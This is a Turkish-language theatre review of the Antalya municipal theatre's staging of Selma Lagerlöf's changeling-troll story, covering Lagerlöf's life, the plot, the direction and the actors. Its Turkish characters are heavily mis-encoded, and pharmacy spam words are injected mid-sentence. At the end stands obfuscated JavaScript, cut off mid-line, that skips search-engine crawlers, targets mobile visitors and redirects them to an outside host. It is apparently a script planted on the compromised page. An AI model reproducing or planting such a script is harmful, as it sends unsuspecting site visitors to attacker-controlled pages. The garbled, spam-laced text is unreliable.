23 Şubat 2019, Cumartesi
SON HABERLER
Buradasınız: Anasayfa / Yazarlar / DeAYiAYtirilmiAY*
DeAYiAYtirilmiAY*

DeAYiAYtirilmiAY*

Selma LagerlA�f(20 KasA�m 1858-16 Mart 1940) Nobel Edebiyat A�dA?lA?a��nA? alan hem ilk kadA�n hem de ilk A�sveA�a��li yazardA�r. A�ocukken geA�irdiAYi bir hastalA�k yA?zA?nden bir sA?re sakat kaldA�AYA� sA�ylenir, yazA�lA�r. A�lginA�tir, bu hastalA�AYA�n dA?zelmesi iA�in gittikleri kaplA�calarda, neAYesinin yerinde olduAYu, A?stA?ndeki korkuyu attA�AYA� bir gA?n kendiliAYinden tekrar yA?rA?meye baAYlara�� Mutlu bir A�ocukluAYu olmuAYtura�� EAYitimini evinde gA�rA?r. Daha sonra Stockholma��e A�AYretmen okuluna gider. 1885a��de Landskronaa��da A�AYretmenliAYe baAYlar. A�ki ciltlik ilk romanA� a�?GA�sta Berlinga�?i (1891)** burada yazar.

A�AYretmenliAYin hayatA�nda A�nemli bir yeri vardA�r, LagerlA�fa��A?na�� GenA�ler arasA�nda mutludur. OnlarA� doAYanA�n iA�inde olmaya davet eder. Bir orman yangA�nA� sonrasA�, yanA�p giden ormanA� yeniden canlandA�rmak iA�in A�AYrencileriyle iAYe koyulur, aAYaA� fidanlarA� dikerlera�� Bu accutane. iAY, A�AYrencileri iA�in A�zdA�rap haline gelmez. Bir eAYlence olarak gA�rA?rler bunu. BA�yle olunca iyi iAY A�A�karmanA�n sevinciyle mutlu olurlar. Bu mutluluAYa, A�ocuklarA�nA�n ne yaptA�AYA�nA� merak eden ana ve babalar da katA�lA�r. Onlar da yeni oluAYturulan ormana el verir. LagerlA�f, A�AYrencileriyle olduAYu kadar velilerle de iyi iliAYkiler kuran bir A�AYretmendir. A�lerde, daha sonraki nesiller, torunlar, atalarA�nA� minnetle anacaklardA�r. Bunu dA?AYA?nmek, akla getirmek mutluluklarA�nA� iki katA�na A�A�kartA�r.

DoAYaya A�ok dA?AYkA?ndA?ra�� Maden, demir fabrikalarA� doAYanA�n orta yerine kurulsa, doAYanA�n gA?zelliAYini bozsa da onlara birA�ok insana ekmek kapA�sA� olduklarA� iA�in karAYA� A�A�kmaz. AynA� zamanda bu fabrikalar,A� A�evrelerinde oluAYturulan demiryollarA�, yollar aracA�lA�AYA�yla yA�renin DA?nyaya aA�A�lmasA�nA� saAYlamaktadA�r. A?lke ekonomisi kalkA�nmaktadA�r.

Orman iAYA�ilerini, kesilen aAYaA�larA�, nehre bA�rakA�lan tomruklarA�, tomruklarA�n suda akA�AYA�nA� A�ok beAYenir. Bunlar birer coAYrafya, toplumsal derslerdir ona gA�re. A?lkesi eAYi bulunmaz bir A?lkedir, insanlarA� nereye gitse ekmeAYini A�A�kartabilir.

LagerlA�fa��A?n zamanA�nA�n korkunA� hastalA�AYA� veremdir. BilinA�sizlikten, hastalA�k karAYA�sA�nda ne yapacaAYA�nA� bilememekten dolayA� veremden sayA�sA�z insan A�lmA?AYtA?r. A�nsanlar, bunun nedenini, A�lA?mA?n gerekA�esini, doAYaA?stA? gA?A�lere, lanetlere, itikatlara yA�kmA�AYlardA�r. Bu hastalA�AYa bilimsel yaklaAYA�lsa A�lA?m oranA� A�ok aAYaAYA�lara A�ekilecektir. LagerlA�f, bilime ve bilimsel A�alA�AYmalara inanan bir insandA�r. BA?tA?n gA?A�lA?klerden sA�yrA�lmanA�n bir yolu vardA�r, yeter ki insan onu bulmasA�nA� bilsin.

A�AYretmenliAYi sA�rasA�nda A�sveA� A?stA?ne kitap yazmayA� tasarlamA�AYtA�r. Bunu hep dA?AYA?nmA?AYtA?r. A�DA?AYA?ncesini gerA�ekleAYtiremeyince kendine kA�zmA�AY, iA�inde gerA�ekdA�AYA� tek bir kelime bulunmayan A�AYretici, aAYA�rbaAYlA� eser yazmayA� baAYkalarA�na bA�rakmA�AYtA�r. LagerlA�f, a�?Nils Holgersona��un SerA?venleria�? ile bir AYekilde amacA�na ulaAYA�r. Masallar, gerA�ekA?stA? olaylar, efsaneler aracA�lA�AYA�yla A�sveA�a��i bu romanla anlatA�r.

LagerlA�f, iAYA�iler kadar kA�ylA?leri de sever. A?lkesinde namuslu kA�ylA?lerle A?lke onuru korunacaktA�r. Anca topraAYA�n tA?kenmez baAYrA�nda A�alA�AYanlar bir A?lkenin refah ve onurunu yA?zyA�llardan yA?zyA�llara ulaAYtA�rabilir. KA�ylA?sA?ne, A�iftA�isine inanA�r, gA?venir, fakat aA�gA�zlA?lA?kle, var olanA�n, gA�llerin, kurutulup tarA�ma aA�A�k alan haline getirilmesini istemez. BA�yle bir doAYa tahribatA�yla sayA�sA�z su hayvanA�, kuAYlar yuvasA�z kalacaktA�r.

YA�rtA�cA� kuAY kartala bile sevgiyle yaklaAYmasA�nA� bilir. Sevgi onun iA�in en deAYerli duygudur. Zor durumda kalanlara yardA�mcA� olunmalA�dA�r. a�?DeAYiAYtirilmiAYa�? oyununun konusu olan yazdA�AYA� a�?KA?A�A?k Trolla�?*** A�ykA?sA?nde de sevgiyi, iyiliAYi iAYler.

Bu A�ykA?de, diAYleri iAYne gibi sivri, saA�larA� yaban domuzunun kA�llarA�na benzeyen, parmaklarA�nda yA�rtA�cA� kA�pek tA�rnaklarA� olan bir Troll A�ocuAYun****A�ykA?sA? iAYlenira�� A�nsanlar arasA�nda Trolla��lere iyi gA�zle bakA�lmaza�� A�htiyar bir Troll karA�sA� sA�rtA�na vurduAYu aAYaA� kabuAYundan bir kA?fede bA�yle bir A�ocuAYu taAYA�yA�p ormanda gezinirken yolda at arabasA�yla gelen kA�ylA? ve karA�sA�nA� gA�rA?r. Hemen saklanA�p beklemeye baAYlar. AmacA�, kA�ylA? kadA�nA�n kucaAYA�nda tuttuAYu A�ocuAYu gA�rmektir. YanA�ndan geA�erlerken baAYA�nA� uzatA�r, atlar A?rker, gemi azA�ya alA�rlar, bu arada A�ocuk dA?AYer. Trol karA�sA�, kendi A�ocuAYuyla bu A�ocuAYu deAYiAYtirip uzaklaAYA�r. AtlarA� sakinleAYtirip geriye dA�nen kA�ylA? ve karA�sA� kendi A�ocuklarA� yerine Troll A�ocuAYu bulurlara�� Bu onlar iA�in kA�tA? bir AYeydira�� Adam, A?A� kere tA?kA?rA?p kucaAYA�na aldA�AYA� A�ocuAYu yere fA�rlatA�r. A�ocuklarA�nA� Trollerin A�aldA�AYA�nA� anlamA�AYtA�ra�� Kendi A�ocuklarA�nA� akAYama kadar ararlar, bulamazlara�� Peki, AYimdi kA?A�A?k Trolla��A? ne yapacaklardA�r? KA�ylA?, A�ocuAYu orada bA�rakmaktan yanadA�r. KadA�n, buna razA� olmaz, burada hayvanlara yem olacaktA�r. A�stemiye istemiye A�ocuAYu A�iftliklerine gA�tA?rA?rler. Bu felaket haber kA�sa sA?rede bA?tA?n kA�ye yayA�lA�ra�� Felaketten kurtulmak iA�in A�AYA?t veren bol olur. Troll, kalA�n bir deAYnekle dA�vA?lmelidir. KA?A�A?k Troll kanA� A�A�kA�ncaya kadar dA�vA?lA?rse ana Troll rA?zgA?r gibi gelir, A?stA?ne kapanA�r, insan A�ocuAYu fA�rlatA�r atar, kendisininkini kaptA�AYA� gibi kaA�ar. KA�ylA? kadA�nA�n iA�i bu A�neriyi kaldA�rmaz. KocasA�nA�n sopasA�nA�n A�nA?ne kendini atar. OAYluna bu yolla kavuAYmak istememektedir. Adam, karA�sA�na A�fkeli, sopayA� atA�p gidera��

KadA�n, Troll A�ocuAYu beslemeye A�alA�AYA�r, ne var ki A�ocuk normal besinler yerine, fare, solucan gibi AYeylerle beslenmek istera�� KadA�n bunlarA� toplar, iAYrenerek de olsa A�ocuAYa yedirir. Adam, karA�sA�nA� A�aresizlik iA�inde izler. KadA�nA�n bu durumu A�evresindekileri, yanaAYmayA�, hizmetA�iyi de etkilera�� Eskisi gibi kendisine itaat etmemeye baAYlarlara�� BA?tA?n olumsuzluklara raAYmen kadA�n kA?A�A?k Trolla��e kol kanat gerer.

Aradan iki sene geA�era�� A�ocuk bA?yA?mA?AYtA?r ve iyice A�irkinleAYmiAYtira�� KadA�n, iA�ten iA�e Troll A�ocuktan kurtulmak ister ama o kadara�� Trolla��e baktA�kA�a kendi A�ocuAYunu dA?AYA?nA?r. Adam, bir gA?n, karA�sA�na kA�yde panayA�r kurulduAYunu sA�yler. PanayA�ra gitmeyi teklif edera�� KadA�n, kabul edera�� Hayvanlar kA�rda olduAYu iA�in yaya olarak gideceklerdir. KadA�n kuAYkulanA�r. Yoksa kocasA� onlar gidince A�ocuAYu uAYaklara mA� A�ldA?rtecektir? Trol A�ocuAYu da yanlarA�na alA�rlara�� A�ocuAYu yolda taAYA�mak A�ok zor olacaktA�ra�� Ormandan, kA�prA?den, kayalarA�n A?stA?nden geA�erler. Kazara oldu sA?sA? verme dA?AYA?ncesiyle adam elinden bA�raktA�AYA�nda kadA�n can havliyle A�ocuAYu dA?AYerken yakalar hep. A�lmesine izin vermez. Adam, A�fkelenir a�?kendi A�ocuAYunu dA?AYA?rdA?AYA?nde bu kadar A�evik deAYildina�? der. Demek ki kocasA�nA�n sevimliliAYi sahteydia�� KadA�n, panayA�ra gitmekten vazgeA�er, geriye dA�nerlera�� Adam, karA�sA�yla bu AYekilde daha fazla nereye kadar yaAYayabileceAYini dA?AYA?nA?r, fakat karA�sA�nA�n A�stA�rap dolu acA�klA� bakA�AYA�yla karAYA�laAYA�nca onu kesinlikle bA�rakamayacaAYA�nA� anlar.

A�ki sene daha geA�era�� NasA�l olduysa bir gece evleri tutuAYur. YangA�n A�A�kmA�AYtA�r. Ancak kendilerini dA�AYarA�ya atacak kadar fA�rsatlarA� vardA�r. YangA�nA�n A�A�kmasA�na sebep olan kA?A�A?k Trolla��dA?r. Adam, keAYke Troll iA�eride kalA�r, dediAYi anda kadA�n kucaAYA�nda Trolla��le dA�AYarA�ya A�A�kar. Adam, A�A�ldA�rA�r, Trolla��A? kaptA�AYA� gibi tekrar alevlerin iA�ine atara�� KadA�n da peAYinden alevlerin iA�ine atA�lA�ra�� KadA�n kucaAYA�nda A�ocuk geri dA�ner. Ev, kA?l olmuAYtur. Adam, Troll ile birlikte yaAYamaya dayanamayacaAYA�nA�, ayrA�lacaAYA�nA� sA�yleyip kadA�nA� terk eder.

Adam, giderken ormanda bir A�ocukla karAYA�laAYA�r. KonuAYurlar. A�ocuAYun oAYlu olduAYu anlaAYA�lA�r. OAYlu anlatA�ra�� Annesi Troll A�ocuAYa iyi davrandA�AYA� iA�in Troll karA�sA� da kendisine iyi davranmA�AYtA�r. Hayatta kalmasA�nA� saAYlamA�AYtA�r. Troll A�ocuAYa iyi bakA�ldA�kA�a ona da iyi bakA�lmA�AYtA�ra�� DA?n gece Troll ateAYin iA�indeyken onu da ateAYe atmA�AYlar, annesi Trolla��A? kurtarA�nca onu da kurtarmA�AYlardA�r. A�ki cephede her AYey eAYzamanlA� olmuAYtur. Adam, A�ocuAYuyla geriye karA�sA�nA�n yanA�na dA�ner.

Sevgia�� Oyunda her AYey sevgi ekseninde dA�ner. A�nsan sevgisini kendisinden olana deAYil, A�tekilere, baAYkalarA�na da yA�neltmelidira�� Sevgi, anca bA�yle deAYer kazanA�ra�� Sevgi eksenini oluAYturan A�zel kiAYi de kA�ylA? kadA�n, annedira�� Anne, oyunun geliAYimi sA?resince tA?m A�atA�AYmalarA�n odaAYA�nda bulur kendinia�� DA?zenli bir evlilik yaAYarlarken birdenbire kocasA�yla A�atA�AYmaya baAYlar, ilk A�ncea��A� Birbirlerine yabancA�laAYmaya baAYlarlara�� Adam, Troll A�ocuktan kurtulmak istedikA�e kadA�n Troll A�ocuAYu korura�� Sadece kocasA� deAYildir bu uAYurda baAY etmesi gereken. KA�yA?n yaAYlA�larA�yla A�atA�AYA�r. Kendi iA� A�atA�AYmalarA� vardA�r. Troll A�ocuAYu bA�raksA�n mA� yoksa sahiplenmeye devam mA� etsin? Temiz yemekleri bir kenara bA�rakmA�AY, kurbaAYa, solucan gibi kA�tA? yiyecekleri toplar olmuAYtur. AlA�AYA�lmamA�AY davranA�AYlara baAYlar, bu uAYaAYA� ve hizmetA�iyi ona karAYA� saygA�sA�z davranA�AYlara itera�� KaybetmediAYi tek AYey Troll de olsa A�ocuAYa karAYA� duyduAYu ilgi ve sevgidira�� Onu bu sayede yanmaktan kurtarA�ra�� AslA�nda, yangA�ndan kurtardA�AYA� kendi A�ocuAYudura�� Troller eAYzamanlA� olarak onun Troll A�ocuAYa yaptA�klarA�nA� insan A�ocuAYa yapmA�AYlar, Troll A�ocuAYa verilen sevgiyi onlar da insan A�ocuktan esirgememiAYlerdir.

YA�netmen A�zer Tunca, kA�y seyirlik oyun geleneAYimize yaslanarak sahneliyor oyunua�� Bir kA�yde, sahnelenebilecek en uygun yerde, bir ahA�rda geA�irtiyor oyunua�� TemizlenebildiAYi kadar temizlenmiAY, orta yeri aA�mak iA�in var olan sepetler, kA?rekler, bA�A�kA�lar, A�uvallar, denkler, merdivenler toplanA�p kenara A�ekilerek ahA�ra A�eki dA?zen verilmiAYa�� Oyunda rol alan kiAYiler de o yerin kA�ylA?leria�� A�yle farz ediliyorlar.A� Oyun alanA�nA�n her iki yanA�na da oyun kiAYilerinin oturacaAYA� sandA�klar sA�ralanmA�AYa�� SA�rasA� gelen oyuncu oyuna katA�lacak olayA�n akA�AYA�ndaki yerini alacaka�� Bu uygulama, oyunun metnindeki tA�kanA�klA�AYA� aA�acak, oyunu rahatlatacak bir uygulamaa�� Oyunun iA�inden A�A�kA�p kendileri olan oyuncular yarattA�klarA� yabancA�laAYmayla bunlarA� saAYlA�yorlara�� BeAY yer var bA�ylea�� Bezden bebek yerine Troll A�ocuAYu oynayan oyuncunun beAYiAYe yattA�AYA�nda dA�AYarA�dan a�?hadi baAYA�r, oyunu baAYlata�? diye uyarA�lmasA�a�� Troll A�ocuAYu oynayan oyuncu aynA� zamanda AnlatA�cA�yA� ve A�nsan A�ocuAYu oynamaktaa�� Bu nedenle rolden role geA�iAYlerde bu yabancA�laAYmalar iAYe yarA�yor, oyuncularA�n ve rejinin iAYini kolaylaAYtA�rA�yora�� A�rneAYin, Troll A�ocuk, A�iftA�i ile karA�sA�nA�n panayA�ra gittiAYi sahnede Troll A�ocuAYu evde bA�rakmak istemeyen kadA�nA�n sA�rtA�na atlA�yora�� TaAYA�nmasA� zora�� Ne yapA�yor bu sefer Troll A�ocuAYu oynayan oyuncu, rolA?nA?n dA�AYA�na A�A�kA�p kenarda bekleyen oyunculardan bir tanesinden A�uval getirmesini istiyora�� A�uval aAYA�r, diyor, A�uvalA� zorlanarak getira�� Getirilen hafif A�uval oluyor mu sana Troll A�ocuka�� Bu yabancA�laAYma ile taAYA�ma sA�kA�ntA�sA� giderildiAYi gibi komik durum yaratA�lA�yor. Seyircilerin gA?ldA?AYA? noktalar hep yabancA�laAYmanA�n saAYlandA�AYA� noktalar oluyora��

Troll A�ocuAYu oynayan oyuncu, A�nsan A�ocuAYu oynamaya geA�tiAYinde yerine geA�ecek ve Troll A�ocuAYu oynayacak oyuncuyu oturanlar arasA�ndan kendi belirliyora�� DiAYer oyuncular arasA�ndan bu role talip olan, bu rolA? oynamak isteyenler var. a�?Bu rolA? ben oynayabilir miyim?a�? dediAYinde tersleniyor, onun yerine baAYkasA� seA�iliyora�� Bu da KA�y seyirlik oyun geleneAYi iA�inde yer alan, oyuncularA�n birbirlerine sataAYmasA�nA� gA�steriyora�� Bu sataAYmalarla komik durumlar yaratA�lA�yor yinea�� Troll A�ocuk son sahnede babasA�yla karAYA�laAYtA�AYA�nda bir anlA�k AnlatA�cA� konumuna geA�iyor, seyircilere yA�nelip babalar hakkA�ndaki eleAYtirel lafA�nA� sA�ylA?yor. Bu da seyircileri gA?ldA?rA?yor.

KA�y seyirlik oyun geleneAYinde var olan eldeki basit araA�larA�n amaA� doAYrultusunda kullanA�lmasA� olayA� bu oyunda da gerA�ekleAYtiriliyora�� A�ki sepet ile araba oluAYturuluyora�� A�ki oyuncu inacid retard. at oluyora�� UzatA�lan tahtalar koAYum takA�mlarA� yerine geA�iyora�� A�ki fA�A�A�nA�n A?stA?ne konulan tahtadan masa yaratA�lA�yora�� A�ki tahta kasa A?stA?ne konulan kalas kA�prA?yA? oluAYturuyora�� A�zer Tunca, oyuncularA�n bedenlerini kullanarak mekA?nlar, alanlar yaratA�yora�� Oyuncular ellerinde tuttuklarA� dal parA�alarA�yla ormanA�, ormanA�n farklA� yerlerini oluAYturuyorlar, farklA� konumlar yarataraka�� BA�ylece, A�zellikle A�iftA�inin ve karA�sA�nA�n A�ocuklarA�nA� aradA�klarA� sahnede orman iA�inde A�ok dolaAYtA�klarA� hissi yaratA�lA�yora�� Tabii ki, bunda hareket ve koreografi A�alA�AYmalarA�nA� yaptA�ran Ozan YA�ldA�rA�ma��A�n payA� da bA?yA?k.

A�zer Tuncaa��nA�n, seyircileri iA�eri alA�rken salonun giriAY kapA�sA�na koydurduAYu Cheap baclofen online, buy lioresal. mumun A?stA?nden ellerini gezdirtmesi A�ok hoAY. Bu bir ritA?ela�� Curcuna mA?ziAYi sonrasA� aynA� iAYlemi sahne A�n ortasA�nda duran mumda oyunculara da yaptA�rtA�yora�� Bu yaptA�rA�mA�n nedeni de Troll efsanelerinden geliyora�� Troller kA�tA? bir alA�AYkanlA�k olarak kendi Troll A�ocuklarA�nA� insan A�ocuklarla deAYiAYtiriyorlar. Bu, insanlar tarafA�ndan istenmeyen bir durum. Bunu engellemek iA�in bir takA�m A�nlemler alA�yorlar. BebeAYin baAYucunda bir mumu sA?rekli yanA�k tuttuklarA� gibi bebeAYi gA�rmeye gelenlerden de ellerini mum ateAYinin A?stA?nde gezdirmelerini istiyorlara�� Bununla da yetinmeyip evlerinin giriAY kapA�sA�nA�n A?stA?ne bA�A�ak asA�yorlar, A�A?nkA? Troller kesici bir alet olan yere giremiyorlara��

On oyuncu yer alA�yor oyunda, iki de mA?zisyen. Hepsi de baAYtan sona oyunun iA�indea�� Hepsi de A�ok baAYarA�lA�a�� DoAYal olarak iA�lerinde aAYA�rlA�klA� rollere sahip olanlar vara�� Selim Turgay Deli bunlardan biria�� AnlatA�cA�yA�, Troll A�ocuAYu ve A�nsan A�ocuAYu oynuyor. AnlatA�cA� da farklA�, Troll A�ocuka��ta farklA�, A�nsan A�ocuka��ta farklA�a�� Bir Troll A�ocukta olmasA� gereken vahAYiliAYi, AYiddeti uygulayA�AYA� hoAYa�� KabalA�AYA�, saldA�rganlA�AYA� A�ok iyi veriyor. AnlatA�cA�ya geA�iAYlerde Troll A�ocukluktan A�ok iyi A�A�kA�yor, gerekli bilgilendirmeleri yaparak oyunun aksiyonunu A�ok iyi yA�nlendiriyora�� A�nsan A�ocukta, oyunun da A�nermesi olan sevginin, sevmenin gA?zelliAYini vurgulamada mimiklerini, ses tonunu A�ok iyi kullanA�yora�� A�ok baAYarA�lA�.

A�iftA�inin karA�sA�nA�, kadA�nA� oynayan AyAYe Sinem Korola, A�atA�AYmalarA�n odak noktasA�ndaki kiAYi olarak duygu deAYiAYim dA�nA?AYA?mA?nA? yoAYun AYekilde yaAYamasA� gerekiyora�� YaAYA�yor da. Tek A�ocuklarA�nA� kaybediyor ormanda, bu onun iA�in yA�kA�ma�� Troll A�ocuAYu sahipleniyor tA?m karA� A�A�kmalara raAYmen, yA�pratA�cA� bir duruma��A� Troll A�ocuAYu kendi A�ocuAYu gibi beslemeye, yetiAYtirmeye A�alA�AYA�yor, nafilea�� Troll A�ocuAYu solucan, fare, sA?mA?klA? bA�cekle beslemek zorunda kalA�yor, canA�ndan bezdirici bir durum. Troll A�ocuAYu sahiplendikA�e kocasA� ondan uzaklaAYA�yor, yanA�nda A�alA�AYanlarA�n alay konusu oluyora�� Sevgi kaybA�nA�n getirdiAYi dayanaksA�zlA�ka�� Terkedilme kaygA�sA�, korkua�� TA?m bunlarA� oluAYturduAYu tavA�r ile A�ok iyi veriyor, AyAYe Sinema�� Duygu deAYiAYimlerinde yA?z ifadesi ve vA?cut dili A�ok iyia��

Harun DaAYaAYan, A�iftA�iyi oynuyora�� KarA�sA�nA� A�ok seven, her koAYulda yanA�ndan ayrA�lmak istemeyena�� Bu nedenle Troll A�ocuAYun varlA�AYA�na bile dayanan, fakat her fA�rsatta Troll A�ocuktan kurtulmayA� deneyena�� A�evresindekilerin sA�zlerini A�nemseyen, onlara kulak verena�� KarA�sA� Troll A�ocuAYu iyice sahiplenince o da giderek karA�sA�na yabancA�laAYA�yor, yangA�n sonrasA� onu terk ediyora�� A�tekileri anlamanA�n A�ok uzaAYA�ndaa�� Bu AYekilde bir duygusal geliAYim A�izgisi var. Harun da bu A�izgiyi A�ok iyi viagra in doha. takip ediyor.

A�aAYatay A�anta, yanaAYma, Azebnem Yurttutan da hizmetA�i-YaAYlA� kadA�na��A� oynuyora�� Evin A�alA�AYanlarA� olarak evin hanA�mA�nA�n yarattA�AYA� tedirginliAYi, sevgi yitimini davranA�AYlarA�, birbirlerine olan yaklaAYA�mlarA�ndaki AYiirselliAYi, A�iftA�iye ve Troll A�ocuAYa karAYA� duyduklarA� korkuyu, A�ekingenliAYi A�ok iyi veriyorlara��

AnA�l AzereflioAYlu YaAYlA� Adama��A�, BaAYak A�zyA�nA?m Troll KadA�na��A�, Erhan A�zdemir BaykuAYa��u, A�nanA� Tartan AtA� ve deAYiAYimle Troll A�ocuAYu, A�aAYdaAY A�obanoAYlu At ve Kediyi oynuyora�� TA?m oyuncular oynamakla kalmA�yor, mA?zisyenlerle birlikte mA?zik yapA�yor. KA?A�A?k bA?yA?k zil, bendir, davul, kaAYA�k A�alA�yorlar oyun A�ncesi, curcuna-uvertA?rdea�� Seyirciler iA�eri alA�nA�rken A�alA�nmaya baAYlanan bu mA?zik harikaa�� MA?zikleri yazan Oktay KA�seoAYlua��na buradan ayrA�ca selam yollamalA�. Oyunun iA�inde mA?zik hep var. Sahne belirlemede, duygularA�n altA�nA� A�izmede, ritmi belirlemede sA?rekli fonda yerini aldA�a�� KeAYke bu mA?zik, seyirciler tamamen iA�eriye alA�ndA�ktan sonra Cialis Professional buy online, generic zithromax. baAYlasaydA�.

Dekor ve kostA?mleri yaratan Dilek kaplan her iki tasarA�mda uygulamaya getirdiAYi rahatlA�k, gA�rsel zenginlikle A�ok baAYarA�lA�a�� IAYA�kta A�zgA?r Dokuyucu, gA?zel bir A�AYA�k dokumasA� yapmA�AY. AnlatA�cA�nA�n devreye girdiAYi anlarda parlak A�AYA�k kullanarak deAYiAYimi netleAYtirmiAY. Alan yaratma ve atmosfer oluAYturmada renkleri A�ok iyi kullanmA�AY.

GA�rA?ldA?AYA? gibi a�?DeAYiAYtirilmiAYa�? oyunu her AYeyiyle mA?kemmel bir oyun.A� A�ok iyi bir AYekilde sahneye konmuAYa�� Geriye, seyircilere oyunu izlemek kalA�yor. Oyundan zevk alacaklarA�, oyunu beAYenecekleri kesin.

 

*a�?DeAYiAYtirilmiAYa�? Antalya BA?yA?kAYehir Belediye Tiyatrosu yapA�mA�dA�r.

Yazan: Selma LagerlA�f, Dramatizasyon: GA�ran TunstrA�m, A�eviri: NurgA�k A�zkale, YA�netmen: A�zer Tunca, Dramaturg: Selen Korad Birkiye, Proje BaAYkanA�: Hasibe A�zgA?r, Reji AsistanA�: A�nanA� Tartan, Dekor ve KostA?m tasarA�mA�: Dilek Kaplan, MA?zik: Oktay KA�seoAYlu, IAYA�k TasarA�mA�: A�zgA?r Dokuyucu, Hareket Koreografi: Ozan YA�ldA�rA�m, YA�netmen YardA�mcA�sA�: BaAYak A�zyA�nA?m

Oyuncular: A�nanA� Tartan, AyAYe Sinem Korala, Azebnem Yurttutan, A�aAYatay A�anta, Selim Turgay Deli, Erhan A�zdemir, AnA�l AzereflioAYlu, A�aAYdaAY A�obanoAYlu, Harun DaAYaAYan, BaAYak A�zyA�nA?m,

MA?zisyenler: Serkan Kandemir(Klarnet), Burcu Zeren(Yan FA?lA?t)

**Selma LagerlA�fa��A?n diAYer eserleri AYunlardA�r: a�?GA�rA?nmez BaAYlara�? A�ykA? kitabA�(1894)a�� Sicilyaa��yA� konu alan a�?Antikrists Miraklor(Deccala��A�n Mucizeleri-1897)a�� En iyi yapA�tlarA�ndan sayA�lan A�ykA? kitabA� a�?Enherrgardsssagen(Malikane A�ykA?leri)a��a�?Jurusalema�?a��A�ocuklar iA�in bir coAYrafya kitabA� niteliAYindeki a�?Nils Holgersosona��un A�sveA� Gezisi-1906a�?a��a�?Marbaccaa�?a��

***LAGERLA�F Selma, a�?Yerle GA�k ArasA�ndaa�? SeA�me HikA?yeler, A�evirenler. E. Koryak BehiA�- A�rs Hayrullah, M.E.B BasA�mevi, A�stanbul, 1952, s.151-170

**** Troller kitabA� A�evirenlerin notuna bakA�lA�rsa, A�skandinav halkA�na gA�re bir A�eAYit cindira�� Selen Korad Birkiyea��nin belirlemesine gA�re ise Trolla��A?n kelime kA�kA? a�?DoAYaA?stA?a�? ya da a�?bA?yA?lA?a�?den gelmektea�� AynA� zamanda anlamA� yaramazlA�AYA�, huysuzluAYu, kA�tA? huylu olmayA� da barA�ndA�rmaktaa�� DaAY yaratA�klarA�a�� DaAYlarda, maAYaralarda yaAYayan, gA?neAYten hoAYlanmayan yaratA�klara��

A�skandinav folkloruna bakA�lA�nca, iki A�eAYit Trolla��den sA�z edilmektea�� Birincisi, kaba saba, iri yarA� A�irkin devler. A�kincisi, insana benzeyen, kuyruklarA� da olan yaratA�klar.

var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v 